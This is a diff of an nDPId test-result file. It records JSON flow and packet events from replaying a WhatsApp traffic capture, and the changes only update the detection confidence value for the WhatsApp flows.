00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1655045751957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655045751957,"pkt":"eJS0JASgYDjgxTWgCABFAAA0toBAAD8GS8nAqAJkszzDMbMAFGajVEhtoOKxA4AQAVeXTwAAAQEICkb+ZC\/0vP+i"} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1655045751963,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655045751963,"pkt":"eJS0JASgYDjgxTWgCABFAAA4toFAAD8GS8TAqAJkszzDMbMAFGajVEhtoOKxA4AYAVdR+QAAAQEICkb+ZDT0vP+iRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655045751925,"flow_last_seen":1655045751993,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655045751993,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45824,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":146,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655037943346,"flow_last_seen":1655037943539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1249,"flow_tot_l4_payload_len":2513,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":1655045752178,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":49026,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":146,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655037784969,"flow_last_seen":1655037785423,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1655045752178,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41214,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655045751925,"flow_last_seen":1655045751993,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655045751993,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45824,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":146,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655037943346,"flow_last_seen":1655037943539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1249,"flow_tot_l4_payload_len":2513,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":1655045752178,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":49026,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":146,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655037784969,"flow_last_seen":1655037785423,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1655045752178,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41214,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":146,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":146,"packets-processed":145,"total-skipped-flows":0,"total-l4-payload-len":10990,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":18,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":18,"total-idle-flows":11,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":117,"global_ts_msec":1655049443230} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655049443230,"flow_last_seen":1655049443230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655049443230,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46406,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1655049443230,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655049443230,"pkt":"eJS0JASgYDjgxTWgCABFAAA8KCVAAD8G2hzAqAJkszzDMbVGFGZeo\/3WAAAAAKAC\/\/\/eUwAAAgQFtAQCCApHIcLoAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1655049443263,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655049443263,"pkt":"eJS0JASgYDjgxTWgCABFAAA0KCZAAD8G2iPAqAJkszzDMbVGFGZeo\/3XmmmBIoAQAVfWlwAAAQEICkchwwlHYNIU"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1655049443356,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655049443356,"pkt":"eJS0JASgYDjgxTWgCABFAAA4KCdAAD8G2h7AqAJkszzDMbVGFGZeo\/3XmmmBIoAYAVeQ6QAAAQEICkchw2ZHYNIURUQAAQ=="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655049443230,"flow_last_seen":1655049443389,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655049443389,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46406,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":154,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655038737650,"flow_last_seen":1655038738381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655049443593,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41288,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":154,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655041569928,"flow_last_seen":1655041570363,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1655049443593,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41610,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655049443230,"flow_last_seen":1655049443389,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655049443389,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46406,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":154,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655038737650,"flow_last_seen":1655038738381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655049443593,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41288,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":154,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655041569928,"flow_last_seen":1655041570363,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1655049443593,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41610,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":154,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":154,"packets-processed":153,"total-skipped-flows":0,"total-l4-payload-len":11307,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":19,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":19,"total-idle-flows":13,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":125,"global_ts_msec":1655050704430} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655050704430,"flow_last_seen":1655050704430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655050704430,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.83.49","src_port":40224,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1655050704430,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655050704430,"pkt":"eJS0JASgYDjgxTWgCABFAAA84MFAAD8GJbDAqAJkHw1TMZ0gFGZ02VSkAAAAAKAC\/\/8otQAAAgQFtAQCCAoO3mAcAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1655050704485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655050704485,"pkt":"eJS0JASgYDjgxTWgCABFAAA04MJAAD8GJbfAqAJkHw1TMZ0gFGZ02VSlljrOS4AQAKxhJgAAAQEICg7eYFQ9kVNR"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1655050704506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655050704506,"pkt":"eJS0JASgYDjgxTWgCABFAAA44MNAAD8GJbLAqAJkHw1TMZ0gFGZ02VSlljrOS4AYAKwbyQAAAQEICg7eYGA9kVNRRUQAAQ=="} 
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655050704430,"flow_last_seen":1655050704560,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655050704560,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.83.49","src_port":40224,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":162,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655042688447,"flow_last_seen":1655042690163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655050704962,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41808,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655050704430,"flow_last_seen":1655050704560,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655050704560,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.83.49","src_port":40224,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":162,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655042688447,"flow_last_seen":1655042690163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655050704962,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41808,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655051220512,"flow_last_seen":1655051220512,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655051220512,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45470,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1655051220512,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655051220512,"pkt":"eJS0JASgYDjgxTWgCABFAAA8rVBAAD8GVQHAqAJkszzDIbGeFGYTOuPqAAAAAKAC\/\/\/5owAAAgQFtAQCCAoFLFKaAAAAAAEDAwk="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1655051220546,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655051220546,"pkt":"eJS0JASgYDjgxTWgCABFAAA0rVFAAD8GVQjAqAJkszzDIbGeFGYTOuPr8T6CsoAQAKwtBgAAAQEICgUsUry7e8sg"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1655051220578,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655051220578,"pkt":"eJS0JASgYDjgxTWgCABFAAA4rVJAAD8GVQPAqAJkszzDIbGeFGYTOuPr8T6CsoAYAKznlAAAAQEICgUsUty7e8sgRUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655051220512,"flow_last_seen":1655051220578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655051220578,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45470,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":170,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655043596112,"flow_last_seen":1655043596381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655051220729,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37482,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655051220512,"flow_last_seen":1655051220578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655051220578,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45470,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":170,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655043596112,"flow_last_seen":1655043596381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655051220729,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37482,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":170,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":170,"packets-processed":169,"total-skipped-flows":0,"total-l4-payload-len":13293,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":21,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":21,"total-idle-flows":15,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":138,"global_ts_msec":1655051492307} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655051492307,"flow_last_seen":1655051492307,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655051492307,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43084,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1655051492307,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655051492307,"pkt":"eJS0JASgYDjgxTWgCABFAAA8gfhAAD8GgEnAqAJkszzDMahMFGbuqHaiAAAAAKAC\/\/+qzgAAAgQFtAQCCAo39wnAAAAAAAEDAwk="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1655051492339,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655051492339,"pkt":"eJS0JASgYDjgxTWgCABFAAA0gflAAD8GgFDAqAJkszzDMahMFGbuqHajLwsyzYAQAIACagAAAQEICjf3Cd8Kl2oU"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1655051492356,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655051492356,"pkt":"eJS0JASgYDjgxTWgCABFAAA4gfpAAD8GgEvAqAJkszzDMahMFGbuqHajLwsyzYAYAIC9BgAAAQEICjf3CfEKl2oURUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655051492307,"flow_last_seen":1655051492493,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655051492493,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43084,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655051492307,"flow_last_seen":1655051492493,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655051492493,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43084,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655051794002,"flow_last_seen":1655051794002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655051794002,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45602,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1655051794002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655051794002,"pkt":"eJS0JASgYDjgxTWgCABFAAA8Ow1AAD8Gx0TAqAJkszzDIbIiFGatOxWzAAAAAKAC\/\/9tHgAAAgQFtAQCCAoFNRLJAAAAAAEDAwk="} 
